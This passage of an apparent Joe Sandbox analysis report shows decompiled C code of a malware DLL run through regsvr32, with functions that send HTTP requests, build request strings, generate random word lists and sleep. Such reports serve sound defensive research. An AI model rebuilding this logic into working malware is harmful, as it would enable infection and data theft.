                      • Part of subcall function 04F956CF: Sleep.KERNEL32(000001F4), ref: 04F95717
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: 01e46d3d4dc829cac1b7695ee3280adba7c82c3cf6db35752b548e1eab4cfe6a
                    • Instruction ID: da3225cb26360bf98d5b77efbf56db263ac1550479cc5c52db57b21f3b342bc5
                    • Opcode Fuzzy Hash: 01e46d3d4dc829cac1b7695ee3280adba7c82c3cf6db35752b548e1eab4cfe6a
                    • Instruction Fuzzy Hash: 3E513F7690020EAFEF10DFA4D98489EB7F6FF88344B158938E515DB224DB35AD46CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 4f943d8-4f943e7 378 4f943e9-4f943f9 call 4f9395b 377->378 379 4f943fb-4f943ff call 4f97a34 377->379 378->379 384 4f9444a GetLastError 378->384 383 4f94404-4f94406 379->383 385 4f94408-4f9442d ResetEvent * 2 HttpSendRequestA 383->385 386 4f94445-4f94448 383->386 389 4f9444c-4f9444e 384->389 387 4f9443a-4f9443d SetEvent 385->387 388 4f9442f-4f94436 GetLastError 385->388 386->384 386->389 391 4f94443 387->391 388->386 390 4f94438 388->390 390->391 391->386
                    C-Code - Quality: 100%
                    			E04F943D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                    				void* __esi;
                    				long _t10;
                    				void* _t18;
                    				void* _t22;
                    
                    				_t9 = __eax;
                    				_t22 = __eax;
                    				if(_a4 != 0 && E04F9395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                    					L9:
                    					return GetLastError();
                    				}
                    				_t10 = E04F97A34(_t9, _t18, _t22, _a8); // executed
                    				if(_t10 == 0) {
                    					ResetEvent( *(_t22 + 0x1c));
                    					ResetEvent( *(_t22 + 0x20));
                    					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                    						SetEvent( *(_t22 + 0x1c));
                    						goto L7;
                    					} else {
                    						_t10 = GetLastError();
                    						if(_t10 == 0x3e5) {
                    							L7:
                    							_t10 = 0;
                    						}
                    					}
                    				}
                    				if(_t10 == 0xffffffff) {
                    					goto L9;
                    				}
                    				return _t10;
                    			}

                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F94412
                    • ResetEvent.KERNEL32(?), ref: 04F94417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04F94424
                    • GetLastError.KERNEL32 ref: 04F9442F
                    • GetLastError.KERNEL32(?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F9444A
                      • Part of subcall function 04F9395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000), ref: 04F93967
                      • Part of subcall function 04F9395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?), ref: 04F939C5
                      • Part of subcall function 04F9395B: lstrcpy.KERNEL32(00000000,00000000), ref: 04F939D5
                    • SetEvent.KERNEL32(?), ref: 04F9443D
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 538ce8c85507eaa4000bc5f0c3f865a1e88844b51e021b622590c5fbe0baa9e2
                    • Instruction ID: 1aa8de5f6e2d5fabf79ba0fe6077dbecdc5ea3ce9414bd5df3bb02287f66ef61
                    • Opcode Fuzzy Hash: 538ce8c85507eaa4000bc5f0c3f865a1e88844b51e021b622590c5fbe0baa9e2
                    • Instruction Fuzzy Hash: C8014B31508200AAFF316F35EC44F5B7AE9EF94728F214629F961920F0DB61EC479A12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    [Figure: control-flow graph of function 04F93A12, blocks 4f93a12 through 4f93b0f, with executed and not-executed blocks marked]
                    C-Code - Quality: 65%
                    			E04F93A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                    				void* _v8;
                    				char _v48;
                    				void* __edi;
                    				intOrPtr _t22;
                    				intOrPtr _t30;
                    				intOrPtr _t37;
                    				void* _t38;
                    				intOrPtr* _t43;
                    				void* _t44;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				intOrPtr _t51;
                    
                    				_t48 = __edx;
                    				_t44 = __ecx;
                    				_t43 = _a16;
                    				_t49 = __eax;
                    				_t22 =  *0x4f9a320; // 0xb2d5a8
                    				_t2 = _t22 + 0x4f9b682; // 0x657a6973
                    				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                    				_t51 =  *0x4f9a3e0; // 0x5ac9b60
                    				_push(0x800);
                    				_push(0);
                    				_push( *0x4f9a2d8);
                    				if( *0x4f9a2ec >= 5) {
                    					if(RtlAllocateHeap() == 0) {
                    						L6:
                    						_a4 = 8;
                    						L7:
                    						if(_a4 != 0) {
                    							L10:
                    							 *0x4f9a2ec =  *0x4f9a2ec + 1;
                    							L11:
                    							return _a4;
                    						}
                    						_t52 = _a16;
                    						 *_t49 = _a16;
                    						_t50 = _v8;
                    						 *_t43 = E04F952A9(_t52, _t50); // executed
                    						_t30 = E04F94DC8(_t50, _t52); // executed
                    						if(_t30 != 0) {
                    							 *_a8 = _t50;
                    							 *_a12 = _t30;
                    							if( *0x4f9a2ec < 5) {
                    								 *0x4f9a2ec =  *0x4f9a2ec & 0x00000000;
                    							}
                    							goto L11;
                    						}
                    						_a4 = 0xbf;
                    						E04F95F6A();
                    						RtlFreeHeap( *0x4f9a2d8, 0, _t50); // executed
                    						goto L10;
                    					}
                    					_t37 = E04F968EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                    					L5:
                    					_a4 = _t37;
                    					goto L7;
                    				}
                    				_t38 = RtlAllocateHeap(); // executed
                    				if(_t38 == 0) {
                    					goto L6;
                    				}
                    				_t37 = E04F92FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
                    				goto L5;
                    			}

















                    APIs
                    • wsprintfA.USER32 ref: 04F93A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93A59
                      • Part of subcall function 04F92FC4: GetTickCount.KERNEL32 ref: 04F92FD8
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93028
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93045
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93065
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93091
                      • Part of subcall function 04F92FC4: HeapFree.KERNEL32(00000000,00000000), ref: 04F930A3
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F930C4
                      • Part of subcall function 04F92FC4: HeapFree.KERNEL32(00000000,00000000), ref: 04F930D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04F93ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: e4125d46180dcfa1604c0f47cb0c4eabd642e2be84be3269f96fc045c84cf5e2
                    • Instruction ID: e06a0c97f22a9bfd8976de6d46b4b5f29c007a7d55b99df1881804e9b9c0d0a9
                    • Opcode Fuzzy Hash: e4125d46180dcfa1604c0f47cb0c4eabd642e2be84be3269f96fc045c84cf5e2
                    • Instruction Fuzzy Hash: B0310C76A00109EBEF12DFA4E884E9A3BEDEB08355F108016F905D7240DB75AD46DBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E04F91000(void** __esi) {
                    				intOrPtr _v0;
                    				intOrPtr _t4;
                    				intOrPtr _t6;
                    				void* _t8;
                    				void* _t9;
                    				intOrPtr _t10;
                    				void* _t11;
                    				void** _t13;
                    
                    				_t13 = __esi;
                    				_t4 =  *0x4f9a3cc; // 0x5ac95b0
                    				__imp__(_t4 + 0x40);
                    				while(1) {
                    					_t6 =  *0x4f9a3cc; // 0x5ac95b0
                    					_t1 = _t6 + 0x58; // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t8 =  *_t13;
                    				if(_t8 != 0 && _t8 != 0x4f9a030) {
                    					HeapFree( *0x4f9a2d8, 0, _t8);
                    				}
                    				_t9 = E04F93B61(_v0, _t13); // executed
                    				_t13[1] = _t9;
                    				_t10 =  *0x4f9a3cc; // 0x5ac95b0
                    				_t11 = _t10 + 0x40;
                    				__imp__(_t11);
                    				return _t11;
                    			}












                    APIs
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F91009
                    • Sleep.KERNEL32(0000000A), ref: 04F91013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F9103B
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F91057
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 96ba90d6ff7da0e9461a719da2d5d9ed08b455f449f13402b8d75e861eda1884
                    • Instruction ID: f80fde7fc5c8998c2a13c152d8489cb235db1e5dedf54b83e9d4b61f6f935a39
                    • Opcode Fuzzy Hash: 96ba90d6ff7da0e9461a719da2d5d9ed08b455f449f13402b8d75e861eda1884
                    • Instruction Fuzzy Hash: 52F03AB0A00296BBFF249F79ED48E1A3BF4EB04344B008014F812D62B1DA3AEC51DA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E04F96535(signed int __edx) {
                    				signed int _v8;
                    				long _v12;
                    				CHAR* _v16;
                    				long _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t21;
                    				CHAR* _t22;
                    				CHAR* _t25;
                    				intOrPtr _t26;
                    				void* _t27;
                    				void* _t31;
                    				void* _t32;
                    				CHAR* _t36;
                    				CHAR* _t42;
                    				CHAR* _t43;
                    				CHAR* _t44;
                    				void* _t49;
                    				void* _t51;
                    				signed char _t56;
                    				intOrPtr _t58;
                    				signed int _t59;
                    				void* _t63;
                    				CHAR* _t67;
                    				CHAR* _t68;
                    				char* _t69;
                    				void* _t70;
                    
                    				_t61 = __edx;
                    				_v20 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_t21 = E04F94843();
                    				if(_t21 != 0) {
                    					_t59 =  *0x4f9a2fc; // 0x4000000a
                    					_t55 = (_t59 & 0xf0000000) + _t21;
                    					 *0x4f9a2fc = (_t59 & 0xf0000000) + _t21;
                    				}
                    				_t22 =  *0x4f9a178(0, 2);
                    				_v16 = _t22;
                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                    					_t25 = E04F91649( &_v8,  &_v20); // executed
                    					_t54 = _t25;
                    					_t26 =  *0x4f9a320; // 0xb2d5a8
                    					if( *0x4f9a2fc > 5) {
                    						_t8 = _t26 + 0x4f9b5cd; // 0x4d283a53
                    						_t27 = _t8;
                    					} else {
                    						_t7 = _t26 + 0x4f9b9f5; // 0x44283a44
                    						_t27 = _t7;
                    					}
                    					E04F95A2D(_t27, _t27);
                    					_t31 = E04F9414A(_t61,  &_v20,  &_v12); // executed
                    					if(_t31 == 0) {
                    						CloseHandle(_v20);
                    					}
                    					_t63 = 5;
                    					if(_t54 != _t63) {
                    						 *0x4f9a310 =  *0x4f9a310 ^ 0x81bbe65d;
                    						_t32 = E04F963FD(0x60);
                    						__eflags = _t32;
                    						 *0x4f9a3cc = _t32;
                    						if(_t32 == 0) {
                    							_push(8);
                    							_pop(0);
                    						} else {
                    							memset(_t32, 0, 0x60);
                    							_t49 =  *0x4f9a3cc; // 0x5ac95b0
                    							_t70 = _t70 + 0xc;
                    							__imp__(_t49 + 0x40);
                    							_t51 =  *0x4f9a3cc; // 0x5ac95b0
                    							 *_t51 = 0x4f9b81a;
                    						}
                    						__eflags = 0;
                    						_t54 = 0;
                    						if(0 == 0) {
                    							_t36 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x43);
                    							__eflags = _t36;
                    							 *0x4f9a364 = _t36;
                    							if(_t36 == 0) {
                    								_push(8);
                    								_pop(0);
                    							} else {
                    								_t56 =  *0x4f9a2fc; // 0x4000000a
                    								_t61 = _t56 & 0x000000ff;
                    								_t58 =  *0x4f9a320; // 0xb2d5a8
                    								_t13 = _t58 + 0x4f9b55a; // 0x697a6f4d
                    								_t55 = _t13;
                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4f99287);
                    							}
                    							__eflags = 0;
                    							_t54 = 0;
                    							if(0 == 0) {
                    								asm("sbb eax, eax");
                    								E04F921BC( ~_v8 &  *0x4f9a310, 0x4f9a00c); // executed
                    								_t42 = E04F94EF3(0, _t55, _t63, 0x4f9a00c); // executed
                    								_t54 = _t42;
                    								__eflags = _t54;
                    								if(_t54 != 0) {
                    									goto L30;
                    								}
                    								_t43 = E04F93C10(); // executed
                    								__eflags = _t43;
                    								if(_t43 != 0) {
                    									__eflags = _v8;
                    									_t67 = _v12;
                    									if(_v8 != 0) {
                    										L29:
                    										_t44 = E04F95458(_t61, _t67, _v8); // executed
                    										_t54 = _t44;
                    										goto L30;
                    									}
                    									__eflags = _t67;
                    									if(__eflags == 0) {
                    										goto L30;
                    									}
                    									_t54 = E04F97576(__eflags,  &(_t67[4]));
                    									__eflags = _t54;
                    									if(_t54 == 0) {
                    										goto L30;
                    									}
                    									goto L29;
                    								}
                    								_t54 = 8;
                    							}
                    						}
                    					} else {
                    						_t68 = _v12;
                    						if(_t68 == 0) {
                    							L30:
                    							if(_v16 == 0 || _v16 == 1) {
                    								 *0x4f9a17c();
                    							}
                    							goto L34;
                    						}
                    						_t69 =  &(_t68[4]);
                    						do {
                    						} while (E04F978DB(_t63, _t69, 0, 1) == 0x4c7);
                    					}
                    					goto L30;
                    				} else {
                    					_t54 = _t22;
                    					L34:
                    					return _t54;
                    				}
                    			}
































                    APIs
                      • Part of subcall function 04F94843: GetModuleHandleA.KERNEL32(4C44544E,00000000,04F9654D,00000001), ref: 04F94852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04F965CA
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memset.NTDLL ref: 04F9661A
                    • RtlInitializeCriticalSection.NTDLL(05AC9570), ref: 04F9662B
                      • Part of subcall function 04F97576: memset.NTDLL ref: 04F97590
                      • Part of subcall function 04F97576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F975D6
                      • Part of subcall function 04F97576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04F975E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04F96656
                    • wsprintfA.USER32 ref: 04F96686
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 6f21ac3f2693148db127ff6dc1b532e7b5ef16603546dc01db535019cc4d0697
                    • Instruction ID: bfe4f8467ececb22569c684ee80ae89f2ec647e6029f951543955ea3a2940532
                    • Opcode Fuzzy Hash: 6f21ac3f2693148db127ff6dc1b532e7b5ef16603546dc01db535019cc4d0697
                    • Instruction Fuzzy Hash: 39519271E00259ABFF61ABB5EC45F6E37F8EB04744F10442AE501EB140EAB9BD468B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E04F937CE(signed int __eax, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				intOrPtr _t81;
                    				char _t83;
                    				signed int _t90;
                    				signed int _t97;
                    				signed int _t99;
                    				char _t101;
                    				unsigned int _t102;
                    				intOrPtr _t103;
                    				char* _t107;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int _t118;
                    				signed int _t122;
                    				intOrPtr _t124;
                    
                    				_t102 = _a8;
                    				_t118 = 0;
                    				_v20 = __eax;
                    				_t122 = (_t102 >> 2) + 1;
                    				_v8 = 0;
                    				_a8 = 0;
                    				_t81 = E04F963FD(_t122 << 2);
                    				_v16 = _t81;
                    				if(_t81 == 0) {
                    					_push(8);
                    					_pop(0);
                    					L37:
                    					return 0;
                    				}
                    				_t107 = _a4;
                    				_a4 = _t102;
                    				_t113 = 0;
                    				while(1) {
                    					_t83 =  *_t107;
                    					if(_t83 == 0) {
                    						break;
                    					}
                    					if(_t83 == 0xd || _t83 == 0xa) {
                    						if(_t118 != 0) {
                    							if(_t118 > _v8) {
                    								_v8 = _t118;
                    							}
                    							_a8 = _a8 + 1;
                    							_t118 = 0;
                    						}
                    						 *_t107 = 0;
                    						goto L16;
                    					} else {
                    						if(_t118 != 0) {
                    							L10:
                    							_t118 = _t118 + 1;
                    							L16:
                    							_t107 = _t107 + 1;
                    							_t15 =  &_a4;
                    							 *_t15 = _a4 - 1;
                    							if( *_t15 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						if(_t113 == _t122) {
                    							L21:
                    							if(_a8 <= 0x20) {
                    								_push(0xb);
                    								L34:
                    								_pop(0);
                    								L35:
                    								E04F917AB(_v16);
                    								goto L37;
                    							}
                    							_t24 = _v8 + 5; // 0xcdd8d2f8
                    							_t103 = E04F963FD((_v8 + _t24) * _a8 + 4);
                    							if(_t103 == 0) {
                    								_push(8);
                    								goto L34;
                    							}
                    							_t90 = _a8;
                    							_a4 = _a4 & 0x00000000;
                    							_v8 = _v8 & 0x00000000;
                    							_t124 = _t103 + _t90 * 4;
                    							if(_t90 <= 0) {
                    								L31:
                    								 *0x4f9a318 = _t103;
                    								goto L35;
                    							}
                    							do {
                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                    								_v12 = _v12 & 0x00000000;
                    								if(_a4 <= 0) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t99 = _v12;
                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                    									if(_t99 == 0) {
                    										break;
                    									}
                    									_v12 = _v12 + 1;
                    									if(_v12 < _a4) {
                    										continue;
                    									}
                    									goto L30;
                    								}
                    								_v8 = _v8 - 1;
                    								L30:
                    								_t97 = _a4;
                    								_a4 = _a4 + 1;
                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                    								__imp__(_t124);
                    								_v8 = _v8 + 1;
                    								_t124 = _t124 + _t97 + 1;
                    							} while (_v8 < _a8);
                    							goto L31;
                    						}
                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                    						_t101 = _t83;
                    						if(_t83 - 0x61 <= 0x19) {
                    							_t101 = _t101 - 0x20;
                    						}
                    						 *_t107 = _t101;
                    						_t113 = _t113 + 1;
                    						goto L10;
                    					}
                    				}
                    				if(_t118 != 0) {
                    					if(_t118 > _v8) {
                    						_v8 = _t118;
                    					}
                    					_a8 = _a8 + 1;
                    				}
                    				goto L21;
                    			}






















                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04F938CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 04F938E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04F938F7
                    • lstrlen.KERNEL32(69B25F45), ref: 04F9391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 9bacb6487d96f13bade31d5462700c4964831580c0d93a6bedaa45aaa3ccb341
                    • Instruction ID: a2d6da87c80f62cfc13160f6817ea455b3fc9e33cc20b5e77b7b849a816e054c
                    • Opcode Fuzzy Hash: 9bacb6487d96f13bade31d5462700c4964831580c0d93a6bedaa45aaa3ccb341
                    • Instruction Fuzzy Hash: A5513B72E00218EBEF218F99C484AADBBF6FF49714F15805AEC55AB211C771AE52CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F93399(void* __edx) {
                    				void* _v8;
                    				int _v12;
                    				WCHAR* _v16;
                    				void* __edi;
                    				void* __esi;
                    				void* _t23;
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t38;
                    				intOrPtr _t42;
                    				void* _t45;
                    				void* _t50;
                    				void* _t52;
                    
                    				_t50 = __edx;
                    				_v12 = 0;
                    				_t23 = E04F940C7(0,  &_v8); // executed
                    				if(_t23 != 0) {
                    					_v8 = 0;
                    				}
                    				_t24 =  *0x4f9a320; // 0xb2d5a8
                    				_t4 = _t24 + 0x4f9be30; // 0x5ac93d8
                    				_t5 = _t24 + 0x4f9bdd8; // 0x4f0053
                    				_t26 = E04F92985( &_v16, _v8, _t5, _t4); // executed
                    				_t45 = _t26;
                    				if(_t45 == 0) {
                    					StrToIntExW(_v16, 0,  &_v12);
                    					_t45 = 8;
                    					if(_v12 < _t45) {
                    						_t45 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t32 =  *0x4f9a320; // 0xb2d5a8
                    						_t11 = _t32 + 0x4f9be24; // 0x5ac93cc
                    						_t48 = _t11;
                    						_t12 = _t32 + 0x4f9bdd8; // 0x4f0053
                    						_t52 = E04F9114D(_t11, _t12, _t11);
                    						_t59 = _t52;
                    						if(_t52 != 0) {
                    							_t35 =  *0x4f9a320; // 0xb2d5a8
                    							_t13 = _t35 + 0x4f9be6e; // 0x30314549
                    							if(E04F95231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                    								_t61 =  *0x4f9a2fc - 6;
                    								if( *0x4f9a2fc <= 6) {
                    									_t42 =  *0x4f9a320; // 0xb2d5a8
                    									_t15 = _t42 + 0x4f9bdba; // 0x52384549
                    									E04F95231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                    								}
                    							}
                    							_t38 =  *0x4f9a320; // 0xb2d5a8
                    							_t17 = _t38 + 0x4f9be68; // 0x5ac9410
                    							_t18 = _t38 + 0x4f9be40; // 0x680043
                    							_t45 = E04F934EE(_v8, 0x80000001, _t52, _t18, _t17);
                    							HeapFree( *0x4f9a2d8, 0, _t52);
                    						}
                    					}
                    					HeapFree( *0x4f9a2d8, 0, _v16);
                    				}
                    				_t54 = _v8;
                    				if(_v8 != 0) {
                    					E04F94B59(_t54);
                    				}
                    				return _t45;
                    			}



















                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05AC93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 04F933E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05AC9410,?,00000000,30314549,00000014,004F0053,05AC93CC), ref: 04F93485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F954F9), ref: 04F93497
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 4b19395d2a84bf48c83009bc8dc69a1bf4c695b97ae52d07ac58b41f605a937b
                    • Instruction ID: 8836a5b4a70b20fe0da676b733b7b10c96d05d4526f7cd84d4bfc508ba2accc9
                    • Opcode Fuzzy Hash: 4b19395d2a84bf48c83009bc8dc69a1bf4c695b97ae52d07ac58b41f605a937b
                    • Instruction Fuzzy Hash: 96316F32900149BFEF129B94EC44E9E77FDEB49704F150069BA00AB151DA72BE099B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 04F9153B
                    • SysAllocString.OLEAUT32(04F92BCC), ref: 04F9157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04F91592
                    • SysFreeString.OLEAUT32(00000000), ref: 04F915A0
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 59c209586d2609ff72215648784eb64d3ae0275ed86f9e7e8ed2bd90f23ff28c
                    • Instruction ID: 782fecc05cdbd32ae70a5bab7662f62960293b5850a667210a284ed71d6eda78
                    • Opcode Fuzzy Hash: 59c209586d2609ff72215648784eb64d3ae0275ed86f9e7e8ed2bd90f23ff28c
                    • Instruction Fuzzy Hash: DB31DBB290020AEFDF45DF98D9848AE7BF5FF48340B51842EF50A97210E775AE46CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E04F957A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
